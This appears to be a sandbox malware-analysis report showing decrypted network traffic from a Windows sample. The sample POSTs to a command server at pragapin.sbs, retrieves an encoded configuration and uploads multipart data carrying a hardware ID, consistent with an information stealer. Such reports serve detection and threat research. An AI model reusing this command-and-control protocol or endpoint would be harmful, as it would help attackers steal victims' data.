                                                                                                                                                                                Nov 10, 2024 09:18:41.070475101 CET1236INData Raw: 52 14 07 fc 6d 24 cc b3 cc 81 a2 c0 52 f3 27 b9 6d 9e 06 3d d8 a8 49 02 32 69 c7 05 42 94 d0 bb e3 bb a9 08 c3 93 50 1b db 84 6d c0 ba 1e 52 98 65 9c 13 76 bd b3 d5 67 29 2f 1f 7b aa 2c 51 a0 fd 85 4f 26 3c 48 a3 81 27 a6 fe ee 7f 78 99 c2 45 cf
                                                                                                                                                                                Data Ascii: Rm$R'm=I2iBPmRevg)/{,QO&<H'xER~ ~Q/f;--M}9!(meKtR*;h;JT2c0#.jt!S000*H0q1(0&UGlobalSign Root
                                                                                                                                                                                Nov 10, 2024 09:18:41.070487976 CET1236INData Raw: 00 01 08 d9 61 24 48 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 81 81 31 0b 30 09 06 03 55 04 06 13 02 42 45 31 19 30 17 06 03 55 04 0a 13 10 47 6c 6f 62 61 6c 53 69 67 6e 20 6e 76 2d 73 61 31 25 30 23 06 03 55 04 0b 13 1c 50 72 69 6d 61 72
                                                                                                                                                                                Data Ascii: a$H0*H010UBE10UGlobalSign nv-sa1%0#UPrimary Object Publishing CA100.U'GlobalSign Primary Object Publishing CA0040122090000Z140127100000Z0c10UBE10UGlobalSign nv-sa10UObje
                                                                                                                                                                                Nov 10, 2024 09:18:41.076433897 CET1120INData Raw: 37 31 30 35 31 5a 30 57 31 0b 30 09 06 03 55 04 06 13 02 42 45 31 19 30 17 06 03 55 04 0a 13 10 47 6c 6f 62 61 6c 53 69 67 6e 20 6e 76 2d 73 61 31 10 30 0e 06 03 55 04 0b 13 07 52 6f 6f 74 20 43 41 31 1b 30 19 06 03 55 04 03 13 12 47 6c 6f 62 61
                                                                                                                                                                                Data Ascii: 71051Z0W10UBE10UGlobalSign nv-sa10URoot CA10UGlobalSign Root CA0"0*H0O~%kH*cgfH+)e-Lp=0OPP.R}m50^CsAj:V98o<i[


                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                0192.168.2.949744104.21.39.34437908C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-10 08:18:08 UTC259OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                Host: pragapin.sbs
                                                                                                                                                                                2024-11-10 08:18:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                2024-11-10 08:18:09 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:09 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=ic6ngm6jhmjntf9j6244qg72p4; expires=Thu, 06-Mar-2025 02:04:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MgD9%2BTWt%2BXQWONW%2FdUU4GkJNz%2BvhHO7tFpYeZDtoQHYl2Z5OoqRvKQNGLuL%2F2UOMGo0netpJIXef6iVTQfbtO%2F7ZYcXxq1kmB%2B4bavQel%2FynQ1OGmBuaWDsquIpxbMc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8e049c35de0e6bae-DFW
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1051&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=903&delivery_rate=2698974&cwnd=251&unsent_bytes=0&cid=127ec611fdcc7258&ts=539&x=0"
                                                                                                                                                                                2024-11-10 08:18:09 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                                2024-11-10 08:18:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                1192.168.2.949751104.21.39.34437908C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-10 08:18:10 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 54
                                                                                                                                                                                Host: pragapin.sbs
                                                                                                                                                                                2024-11-10 08:18:10 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 53 74 61 79 41 77 61 79 37 37 37 26 6a 3d
                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@StayAway777&j=
                                                                                                                                                                                2024-11-10 08:18:10 UTC1003INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:10 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=d5vb67r4g6fc217jg0g1ba5ogt; expires=Thu, 06-Mar-2025 02:04:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LiLxTiBSTrE8PC41E0ippAsQr0H%2Fkg2TetIEdxU3MSVjpDPAUgJEOuBvktVMN5Nu4DgFRnrWPO4L9g0Dq10%2BfKxQlLdg23ETLWudlKIY304wgSxkrnCrjqeNP9p6z6A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8e049c3d4bfb4755-DFW
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1195&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=950&delivery_rate=2405315&cwnd=229&unsent_bytes=0&cid=a3a88ebe2ef4239e&ts=526&x=0"
                                                                                                                                                                                2024-11-10 08:18:10 UTC366INData Raw: 34 34 36 63 0d 0a 54 58 30 6d 55 61 68 68 71 31 52 37 68 33 48 62 4d 5a 74 64 58 51 42 57 67 63 53 35 6c 7a 42 51 2b 4d 47 55 47 66 68 64 65 6e 6f 32 58 31 42 7a 6b 6c 57 48 64 67 6a 69 55 2b 46 46 36 53 67 34 4c 48 54 67 6f 4a 75 74 56 6a 47 55 73 76 45 31 32 69 73 58 57 48 63 62 52 7a 33 62 42 49 64 32 48 76 39 54 34 57 72 67 66 7a 68 75 64 4c 76 6d 33 50 31 53 4d 5a 53 6a 39 58 4b 58 4c 52 59 5a 4a 52 46 42 4f 63 30 43 7a 7a 55 58 36 68 53 2b 56 50 6f 33 4d 32 6b 37 36 61 6d 62 75 78 49 31 67 75 4f 75 4f 37 55 34 44 68 73 41 48 46 55 36 69 68 79 48 4c 31 6e 69 48 2f 6b 4c 75 54 77 34 59 6a 72 6e 6f 4e 4c 2f 57 44 69 63 6f 76 42 7a 69 44 51 63 45 69 55 66 51 6a 6a 48 43 39 73 34 48 65 30 66 75 46 37 36 66 33 45 69 4d 2f 76 6d 67 37 55 42 41 4a 6d 79 35
                                                                                                                                                                                Data Ascii: 446cTX0mUahhq1R7h3HbMZtdXQBWgcS5lzBQ+MGUGfhdeno2X1BzklWHdgjiU+FF6Sg4LHTgoJutVjGUsvE12isXWHcbRz3bBId2Hv9T4WrgfzhudLvm3P1SMZSj9XKXLRYZJRFBOc0CzzUX6hS+VPo3M2k76ambuxI1guOuO7U4DhsAHFU6ihyHL1niH/kLuTw4YjrnoNL/WDicovBziDQcEiUfQjjHC9s4He0fuF76f3EiM/vmg7UBAJmy5
                                                                                                                                                                                2024-11-10 08:18:10 UTC1369INData Raw: 4e 6a 4a 76 4e 4f 36 73 31 50 5a 53 4e 5a 43 70 2b 58 47 65 4d 68 55 65 4c 78 38 45 66 59 6f 45 30 58 5a 42 70 54 43 38 51 2f 34 7a 4b 53 41 4f 6f 37 6d 56 37 42 49 31 6c 75 4f 75 4f 35 49 36 47 78 73 6b 45 45 63 37 77 52 48 4a 4a 42 2f 6f 46 71 74 56 2f 44 45 31 59 53 62 70 71 4e 33 32 57 7a 6d 54 70 76 46 2f 32 6e 46 59 48 7a 64 66 48 48 50 72 44 73 49 36 45 2f 49 54 2b 55 79 33 4a 6e 39 6c 4f 4b 50 2b 6d 2f 46 54 4e 70 75 6e 2b 48 57 65 4d 78 34 57 49 68 42 43 4f 63 6f 45 77 7a 34 52 35 42 36 79 58 50 6b 36 4d 6d 59 79 37 36 66 65 74 52 78 79 6e 62 75 32 49 39 6f 52 48 78 73 39 58 58 45 77 78 41 33 4f 49 46 6e 36 58 61 41 54 2f 6a 4e 2f 4f 6e 54 74 6f 39 54 6e 55 79 43 66 72 65 52 33 6e 7a 6b 56 47 79 45 66 51 54 54 48 44 63 38 78 47 75 30 58 75 46 33
                                                                                                                                                                                Data Ascii: NjJvNO6s1PZSNZCp+XGeMhUeLx8EfYoE0XZBpTC8Q/4zKSAOo7mV7BI1luOuO5I6GxskEEc7wRHJJB/oFqtV/DE1YSbpqN32WzmTpvF/2nFYHzdfHHPrDsI6E/IT+Uy3Jn9lOKP+m/FTNpun+HWeMx4WIhBCOcoEwz4R5B6yXPk6MmYy76fetRxynbu2I9oRHxs9XXEwxA3OIFn6XaAT/jN/OnTto9TnUyCfreR3nzkVGyEfQTTHDc8xGu0XuF3
                                                                                                                                                                                2024-11-10 08:18:10 UTC1369INData Raw: 6e 54 76 72 39 76 2b 57 44 61 61 70 50 74 2b 6d 54 67 62 46 53 67 56 53 6a 54 4f 44 38 41 37 48 2b 55 55 76 56 62 72 4f 6a 5a 75 4f 4b 50 6f 6d 2f 4a 4b 63 73 4c 6a 32 58 79 4d 50 44 63 62 50 68 59 45 4c 49 51 61 69 54 45 56 70 55 76 35 56 50 77 33 4e 47 51 38 34 37 54 65 2b 31 6b 7a 6b 4b 58 33 64 70 59 35 47 42 6b 76 47 55 67 7a 7a 51 54 62 4a 42 7a 6a 41 62 4d 54 74 33 38 34 65 6e 53 37 35 75 33 6c 52 53 4f 4d 34 63 4e 34 6c 44 45 66 44 6d 38 41 43 69 71 4b 42 4d 56 32 51 61 55 59 75 56 2f 2b 4e 7a 6c 6d 50 4f 79 70 30 75 64 54 50 70 53 78 38 58 75 54 4d 52 63 55 4a 68 4a 44 50 73 45 4a 78 44 49 65 35 46 50 33 45 2f 34 6e 66 7a 70 30 31 62 62 57 2b 58 77 35 6c 71 71 32 5a 4e 51 6d 57 42 38 6a 58 78 78 7a 7a 67 2f 42 50 42 62 73 47 62 4e 63 38 44 38 33
                                                                                                                                                                                Data Ascii: nTvr9v+WDaapPt+mTgbFSgVSjTOD8A7H+UUvVbrOjZuOKPom/JKcsLj2XyMPDcbPhYELIQaiTEVpUv5VPw3NGQ847Te+1kzkKX3dpY5GBkvGUgzzQTbJBzjAbMTt384enS75u3lRSOM4cN4lDEfDm8ACiqKBMV2QaUYuV/+NzlmPOyp0udTPpSx8XuTMRcUJhJDPsEJxDIe5FP3E/4nfzp01bbW+Xw5lqq2ZNQmWB8jXxxzzg/BPBbsGbNc8D83
                                                                                                                                                                                2024-11-10 08:18:10 UTC1369INData Raw: 62 63 37 52 4a 71 32 6f 7a 52 54 74 67 65 49 6c 67 77 55 56 31 7a 7a 51 2b 4a 62 6c 6e 70 45 4c 56 62 39 6a 6b 32 62 6a 37 71 72 64 66 2b 56 6a 36 54 70 76 42 36 6e 7a 6f 5a 48 43 4d 56 51 6a 44 4a 44 4d 59 35 45 61 56 64 2b 56 54 68 66 32 63 69 45 66 53 74 31 66 4d 53 4c 64 53 36 74 6e 79 57 66 30 42 59 49 78 5a 43 4e 63 38 50 79 44 41 52 34 42 75 39 55 76 38 35 50 47 30 77 35 71 66 55 38 56 34 38 6b 4b 4c 33 64 35 45 77 45 78 31 76 55 51 51 30 30 6b 4f 52 64 69 6a 6d 42 61 35 44 39 58 38 67 4c 43 32 6a 6f 64 65 31 43 6e 4b 62 73 66 78 78 6c 44 6f 58 48 53 77 51 51 7a 37 4d 44 38 4d 2f 45 65 4d 63 73 45 48 36 4d 7a 46 6c 4f 75 2b 6f 31 76 39 52 50 39 72 74 74 6e 79 43 66 30 42 59 41 78 68 4a 48 63 45 50 7a 6e 59 47 71 77 72 35 56 50 56 2f 5a 79 49 34 36
                                                                                                                                                                                Data Ascii: bc7RJq2ozRTtgeIlgwUV1zzQ+JblnpELVb9jk2bj7qrdf+Vj6TpvB6nzoZHCMVQjDJDMY5EaVd+VThf2ciEfSt1fMSLdS6tnyWf0BYIxZCNc8PyDAR4Bu9Uv85PG0w5qfU8V48kKL3d5EwEx1vUQQ00kORdijmBa5D9X8gLC2jode1CnKbsfxxlDoXHSwQQz7MD8M/EeMcsEH6MzFlOu+o1v9RP9rttnyCf0BYAxhJHcEPznYGqwr5VPV/ZyI46
                                                                                                                                                                                2024-11-10 08:18:10 UTC1369INData Raw: 43 4d 64 69 53 34 48 69 4d 4e 42 55 55 62 77 41 4b 4b 6f 6f 45 78 58 5a 42 70 52 57 32 57 76 6f 77 50 6d 73 34 37 71 50 53 38 46 4d 30 6e 71 6e 38 65 35 77 35 47 52 30 6c 48 45 55 35 77 77 54 42 4d 52 72 33 55 2f 63 54 2f 69 64 2f 4f 6e 54 4b 6f 63 6e 37 51 6e 4b 46 37 65 38 37 6e 54 4e 59 51 47 38 62 54 6a 7a 4f 42 4d 55 77 48 4f 4d 65 75 46 7a 34 50 7a 42 6d 50 2b 71 67 32 76 68 58 50 35 36 78 2f 48 43 56 4d 78 45 55 49 6c 38 4b 63 38 30 62 69 57 35 5a 31 42 36 33 58 66 34 70 66 33 31 36 2b 75 62 63 2b 52 4a 71 32 71 4c 36 64 4a 6b 77 47 78 73 75 46 56 59 68 78 67 72 42 4d 78 58 75 48 62 39 42 2f 7a 41 32 59 54 66 71 6f 64 50 35 57 44 47 64 34 37 67 37 6e 53 64 59 51 47 38 38 55 79 50 48 51 39 5a 34 41 4b 55 55 74 52 4f 68 66 7a 64 76 50 4f 6d 69 33 50
                                                                                                                                                                                Data Ascii: CMdiS4HiMNBUUbwAKKooExXZBpRW2WvowPms47qPS8FM0nqn8e5w5GR0lHEU5wwTBMRr3U/cT/id/OnTKocn7QnKF7e87nTNYQG8bTjzOBMUwHOMeuFz4PzBmP+qg2vhXP56x/HCVMxEUIl8Kc80biW5Z1B63Xf4pf316+ubc+RJq2qL6dJkwGxsuFVYhxgrBMxXuHb9B/zA2YTfqodP5WDGd47g7nSdYQG88UyPHQ9Z4AKUUtROhfzdvPOmi3P
                                                                                                                                                                                2024-11-10 08:18:10 UTC1369INData Raw: 6f 50 5a 2f 6e 6a 67 64 47 79 4d 55 51 7a 44 46 42 38 41 34 45 4f 70 54 39 78 50 2b 4a 33 38 36 64 4d 4b 39 32 50 6c 66 63 6f 58 74 37 7a 75 64 4d 31 68 41 62 78 4e 4b 4e 73 6f 4a 7a 7a 49 63 34 78 6d 38 55 2f 49 38 4d 47 59 79 35 36 6e 62 2f 6c 73 7a 6e 4b 62 38 63 4a 77 79 47 78 34 70 58 77 70 7a 7a 52 75 4a 62 6c 6e 46 43 4c 52 66 2f 6e 38 67 4c 43 32 6a 6f 64 65 31 43 6e 4b 52 72 2f 4a 38 6d 6a 49 62 45 43 6f 62 54 6a 62 4b 43 39 73 2b 47 65 49 42 71 31 50 77 4f 6a 4e 68 4e 4f 65 67 30 76 4e 52 4e 74 72 74 74 6e 79 43 66 30 42 59 41 68 4e 44 47 73 30 59 69 53 6c 58 2f 46 4f 2b 58 37 6c 6e 66 32 4d 2f 36 61 6e 57 39 6c 51 78 6b 61 62 38 65 70 30 33 46 51 6f 73 45 45 73 33 79 67 7a 50 4d 42 6a 71 46 62 35 61 2b 44 63 34 49 6e 71 6a 6f 63 4f 31 43 6e 4b
                                                                                                                                                                                Data Ascii: oPZ/njgdGyMUQzDFB8A4EOpT9xP+J386dMK92PlfcoXt7zudM1hAbxNKNsoJzzIc4xm8U/I8MGYy56nb/lsznKb8cJwyGx4pXwpzzRuJblnFCLRf/n8gLC2jode1CnKRr/J8mjIbECobTjbKC9s+GeIBq1PwOjNhNOeg0vNRNtrttnyCf0BYAhNDGs0YiSlX/FO+X7lnf2M/6anW9lQxkab8ep03FQosEEs3ygzPMBjqFb5a+Dc4InqjocO1CnK
                                                                                                                                                                                2024-11-10 08:18:10 UTC1369INData Raw: 4e 70 78 57 42 64 76 52 33 31 7a 77 77 54 53 4a 77 2f 6f 41 37 34 54 78 6e 46 2f 65 6e 53 37 35 75 37 32 58 44 79 64 74 65 63 32 76 53 6b 53 48 7a 38 59 55 7a 79 4b 54 59 6b 77 57 62 31 41 39 78 50 39 4c 6e 38 36 5a 4c 48 39 6a 71 59 46 59 73 69 38 75 47 4c 61 4b 56 68 41 66 56 45 45 49 59 70 62 69 58 45 61 39 77 47 2f 55 4f 38 38 65 46 77 4b 78 4c 7a 57 38 30 55 6a 70 4a 33 78 59 5a 63 35 44 77 6c 6a 43 6b 63 39 78 41 54 66 64 6c 65 6c 48 50 6b 4c 77 48 39 33 49 67 75 74 35 73 4f 31 43 6e 4b 76 6f 50 68 31 6e 53 6b 4a 56 51 67 46 53 54 58 64 45 6f 6c 34 57 65 4e 54 34 51 4f 33 66 7a 74 7a 64 4c 76 32 69 61 34 48 59 63 33 7a 70 47 54 55 4a 6c 67 4f 62 30 63 57 66 59 6f 52 69 57 35 5a 6f 68 43 72 51 66 38 38 4b 57 46 7a 33 5a 6a 31 38 6c 51 33 6e 62 4f 30
                                                                                                                                                                                Data Ascii: NpxWBdvR31zwwTSJw/oA74TxnF/enS75u72XDydtec2vSkSHz8YUzyKTYkwWb1A9xP9Ln86ZLH9jqYFYsi8uGLaKVhAfVEEIYpbiXEa9wG/UO88eFwKxLzW80UjpJ3xYZc5DwljCkc9xATfdlelHPkLwH93Igut5sO1CnKvoPh1nSkJVQgFSTXdEol4WeNT4QO3fztzdLv2ia4HYc3zpGTUJlgOb0cWfYoRiW5ZohCrQf88KWFz3Zj18lQ3nbO0
                                                                                                                                                                                2024-11-10 08:18:10 UTC1369INData Raw: 55 2f 49 52 68 46 4a 64 6f 55 78 6e 5a 58 70 52 58 35 43 36 74 78 66 32 59 6c 6f 2f 36 4c 70 77 6c 6e 79 66 53 6d 4b 59 56 78 41 56 67 35 58 78 78 68 68 45 50 62 64 6b 47 6c 56 4c 70 42 36 7a 6b 38 64 44 65 6b 6d 4f 58 53 58 44 57 62 74 65 5a 73 6c 58 41 32 4c 67 34 68 65 69 62 4a 44 63 63 78 44 2f 52 54 39 78 50 32 66 32 64 62 64 4b 76 6d 35 4c 73 53 4b 74 72 37 74 6b 36 5a 4d 52 59 66 4f 51 34 4a 46 4d 51 45 79 43 41 4a 38 68 7a 32 66 63 38 65 66 79 78 30 35 65 61 44 70 78 78 79 6e 72 4b 32 49 38 70 74 51 30 31 38 53 42 52 68 31 55 33 51 64 67 2b 6c 53 2b 73 64 75 53 31 2f 4f 6e 53 6b 70 63 6e 6e 56 44 47 4d 6f 4c 46 46 70 42 67 57 48 79 34 4a 56 44 37 47 49 73 6f 6e 45 39 73 74 72 46 44 33 4d 54 68 30 4a 61 50 6f 6d 2f 6f 53 61 71 50 6a 76 6a 75 6c 63
                                                                                                                                                                                Data Ascii: U/IRhFJdoUxnZXpRX5C6txf2Ylo/6LpwlnyfSmKYVxAVg5XxxhhEPbdkGlVLpB6zk8dDekmOXSXDWbteZslXA2Lg4heibJDccxD/RT9xP2f2dbdKvm5LsSKtr7tk6ZMRYfOQ4JFMQEyCAJ8hz2fc8efyx05eaDpxxynrK2I8ptQ018SBRh1U3Qdg+lS+sduS1/OnSkpcnnVDGMoLFFpBgWHy4JVD7GIsonE9strFD3MTh0JaPom/oSaqPjvjulc
                                                                                                                                                                                2024-11-10 08:18:10 UTC1369INData Raw: 4e 51 79 50 4a 51 65 55 78 46 4f 6b 74 68 32 54 6f 4f 43 38 67 45 75 43 77 32 4c 55 63 63 6f 4c 6a 72 6a 75 33 4c 52 38 49 4c 46 31 6f 4e 4d 63 50 69 53 6c 58 2f 46 4f 76 45 36 46 73 63 53 49 6d 6f 2f 36 62 73 6c 45 67 69 4b 58 31 62 5a 6c 34 4a 69 59 43 44 55 4d 6a 79 55 48 34 4f 78 33 7a 42 72 70 44 2f 67 45 42 54 79 62 6b 74 74 69 33 64 77 6a 59 6b 75 42 34 6d 6a 45 66 57 47 46 66 58 48 4f 53 51 2b 51 6b 48 76 55 51 2b 33 62 44 66 51 35 30 4e 2b 4f 6f 33 4c 56 4e 66 49 50 6a 34 44 76 43 62 46 5a 59 50 56 38 63 63 34 30 4e 78 44 63 61 36 78 43 72 51 66 38 38 4b 57 46 7a 33 5a 6a 30 2f 6c 4d 69 6c 37 4c 37 66 34 77 42 4a 6a 38 70 47 6b 4d 4e 39 44 54 59 4d 51 6d 6e 4e 62 70 46 2b 6e 39 78 49 69 79 6a 2f 70 76 53 56 44 65 64 34 37 67 37 6e 6e 39 41 57 41
                                                                                                                                                                                Data Ascii: NQyPJQeUxFOkth2ToOC8gEuCw2LUccoLjrju3LR8ILF1oNMcPiSlX/FOvE6FscSImo/6bslEgiKX1bZl4JiYCDUMjyUH4Ox3zBrpD/gEBTybktti3dwjYkuB4mjEfWGFfXHOSQ+QkHvUQ+3bDfQ50N+Oo3LVNfIPj4DvCbFZYPV8cc40NxDca6xCrQf88KWFz3Zj0/lMil7L7f4wBJj8pGkMN9DTYMQmnNbpF+n9xIiyj/pvSVDed47g7nn9AWA


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                2192.168.2.949761104.21.39.34437908C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-10 08:18:11 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=YH0BNR3A0387TVJW2VMZ6BT8IM30N
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 12918
                                                                                                                                                                                Host: pragapin.sbs
                                                                                                                                                                                2024-11-10 08:18:11 UTC12918OUTData Raw: 2d 2d 59 48 30 42 4e 52 33 41 30 33 38 37 54 56 4a 57 32 56 4d 5a 36 42 54 38 49 4d 33 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 45 46 32 45 39 30 31 42 41 31 45 41 34 31 39 34 39 31 33 35 43 44 30 42 33 31 45 30 45 32 33 0d 0a 2d 2d 59 48 30 42 4e 52 33 41 30 33 38 37 54 56 4a 57 32 56 4d 5a 36 42 54 38 49 4d 33 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 48 30 42 4e 52 33 41 30 33 38 37 54 56 4a 57 32 56 4d 5a 36 42 54 38 49 4d 33 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d
                                                                                                                                                                                Data Ascii: --YH0BNR3A0387TVJW2VMZ6BT8IM30NContent-Disposition: form-data; name="hwid"2EF2E901BA1EA41949135CD0B31E0E23--YH0BNR3A0387TVJW2VMZ6BT8IM30NContent-Disposition: form-data; name="pid"2--YH0BNR3A0387TVJW2VMZ6BT8IM30NContent-Disposition: form-
                                                                                                                                                                                2024-11-10 08:18:12 UTC1012INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:12 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=eod66j4j440v1rq9d1ui1al6t9; expires=Thu, 06-Mar-2025 02:04:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vN1wVV6nA3ASZovWNYX8re7dISlx8dTYS2tlfhh9PQjAkt6XfmuJncseqjEbffSOmv%2BjlqmJYOhu%2Bglbg%2FydVWKLSLYpHXe%2BRv%2BEbD4lipbwikHQeSb2drw85vb6Vhk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8e049c4619286bf6-DFW
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1061&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2828&recv_bytes=13865&delivery_rate=2669124&cwnd=252&unsent_bytes=0&cid=e01352c821fe247f&ts=740&x=0"
                                                                                                                                                                                2024-11-10 08:18:12 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                                                                                                                Data Ascii: 11ok 173.254.250.72
                                                                                                                                                                                2024-11-10 08:18:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                3192.168.2.949769104.21.39.34437908C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-10 08:18:13 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=R70UTMJN4BNJ5HHTW61Q
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 15082
                                                                                                                                                                                Host: pragapin.sbs
